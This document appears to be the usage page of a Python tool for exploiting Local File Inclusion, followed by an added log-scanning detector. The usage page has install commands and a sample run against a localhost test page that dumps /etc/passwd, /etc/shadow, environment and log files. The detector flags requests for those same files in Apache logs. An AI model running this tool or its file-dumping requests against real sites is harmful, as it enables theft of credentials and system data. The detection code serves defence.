Simple-Local-File-Inclusion-Exploiter
Description
Simple Local File Inclusion Exploiter is a Python script that identifies whether a page is vulnerable to Local File Inclusion (LFI) attacks.
Installation
$ mkdir -p /pentest/web/lfi-sploiter/
$ cd /pentest/web/lfi-sploiter/
$ wget http://packetstorm.linuxsecurity.com/UNIX/scanners/lfi_sploiter.py.txt
$ mv lfi_sploiter.py.txt lfi_sploiter.py
Usage
Syntax
$ python lfi_sploiter.py \
    --exploit-url="<http://url>" \
    --vulnerable-parameter="<parameter>"
Options
Both options are mandatory:
- --exploit-url="<url>"
  URL to exploit (e.g. --exploit-url="http://192.168.1.1/index.php?page=1")
- --vulnerable-parameter="<param>"
  Name of the parameter to exploit (e.g. --vulnerable-parameter="page")
Example
The following example is a proof of concept tested against a specific piece of vulnerable code, which you can download here.
$ python lfi_sploiter.py --exploit-url="http://localhost/poc/LFI/index.php?page=1" \
    --vulnerable-parameter="page"

Simple Local File Inclusion Exploiter
by Valentin Hoebel (valentin ( a t ) xenuser ( d o t ) org)

Version 1.0 (21th November 2010)  ^__^
                                  (oo)\________
                                  (__)\        )\/\
                                      ||----w |
Power to teh cows!                    ||     ||
____________________________________________________

[i] Provided URL to exploit: http://localhost/poc/LFI/index.php?page=1
[i] Provided vulnerable parameter: page
[i] Assuming the provided data was correct.
[i] Trying to establish a connection with a random user agent...
[i] Connected to target! URL seems to be valid.
[i] Jumping to the exploit feature.
[i] For exploiting the LFI vulnerability we need to split the URL into its parts.
[i] IP address / domain: localhost
[i] Script: /poc/LFI/index.php
[i] URL query string: page=1
[i] It seems that the URL contains at least one parameter.
[i] Trying to find also other parameters...
[i] No other parameters were found.
[i] The following 1 parameter(s) was/were found:
[i] {'page': '1'}
[i] According to you, the vulnerable parameter should be: page
[i] Checking if this parameter exists in the provided URL...
[i] Found your vulnerable parameter in the URL.
[i] Now trying to find out how this LFI vulnerability can be exploited...
[i] This can take a while.
[+] Found signs of a successfull LFI vulnerability! No nullbyte was required.
[+] URL: http://localhost/poc/LFI/index.php?page=/etc/passwd
[i] Exploiting the LFI vulnerability starts right now.
[i] Trying to dump some interesting files to your local hard disk...
[+] Dumping file: /etc/passwd
[+] Dumping file: /proc/self/environ
[+] Dumping file: /var/log/apache2/access.log
[+] Dumping file: /var/log/apache2/error.log
[+] Dumping file: /etc/shadow
[+] Dumping file: /etc/group
[+] Dumping file: /var/log/auth.log
[+] Dumping file: /proc/self/status
[+] Dumping file: /proc/self/mounts
[+] Dumping file: /proc/cpuinfo
[+] Dumping file: /proc/meminfo
[i] Hint: The files are also dumped when we have no permission to view them.
[i] Instead of the file, the PHP error message will be dumped.
[i] Completed the task. Will now exit!
[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool.
[i] Feel free to send in some feedback!
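The run above requests a fixed list of system files through one query parameter, which leaves a recognisable pattern in the web server's access log. The following Python sketch is an added example, not part of lfi_sploiter.py or the original page; it flags that pattern, and the Apache common/combined log format, the sample lines and all function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Files the tool reports dumping in the run shown above.
DUMP_TARGETS = {
    "/etc/passwd", "/proc/self/environ", "/var/log/apache2/access.log",
    "/var/log/apache2/error.log", "/etc/shadow", "/etc/group",
    "/var/log/auth.log", "/proc/self/status", "/proc/self/mounts",
    "/proc/cpuinfo", "/proc/meminfo",
}
# Client, request target and status from an Apache common/combined log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Nov/2010:10:00:01 +0000] "GET /poc/LFI/index.php?page=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [21/Nov/2010:10:00:02 +0000] "GET /poc/LFI/index.php?page=/etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [21/Nov/2010:10:00:02 +0000] "GET /poc/LFI/index.php?page=/proc/self/environ HTTP/1.1" 200 311',
    '203.0.113.5 - - [21/Nov/2010:10:00:03 +0000] "GET /poc/LFI/index.php?page=%2Fetc%2Fshadow%00 HTTP/1.1" 200 207',
    '198.51.100.7 - - [21/Nov/2010:10:05:00 +0000] "GET /poc/LFI/index.php?page=about HTTP/1.1" 200 900',
]

def normalise(value):
    """Canonicalise a parameter value the way the file system would see it."""
    for _ in range(2):  # undo any percent-encoding still left in the value
        value = unquote(value)
    value = value.split("\x00", 1)[0]  # a null byte truncates the path
    return posixpath.normpath("/" + value.lstrip("/"))

def find_lfi_probes(log_lines):
    """Return (client, parameter, path, status) for each dump-target request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for name, value in parse_qsl(urlsplit(target).query):
            path = normalise(value)
            if path in DUMP_TARGETS:
                hits.append((client, name, path, int(status)))
    return hits

def burst_clients(hits, threshold=3):
    """Clients that asked for at least `threshold` distinct dump targets."""
    clients = {c for c, _, _, _ in hits}
    return sorted(c for c in clients
                  if len({p for cl, _, p, _ in hits if cl == c}) >= threshold)
```

A hit with status 200 only shows that the request was served; as the tool's own hint says, the response may hold a PHP error message rather than the file, so compare response sizes before treating it as disclosure.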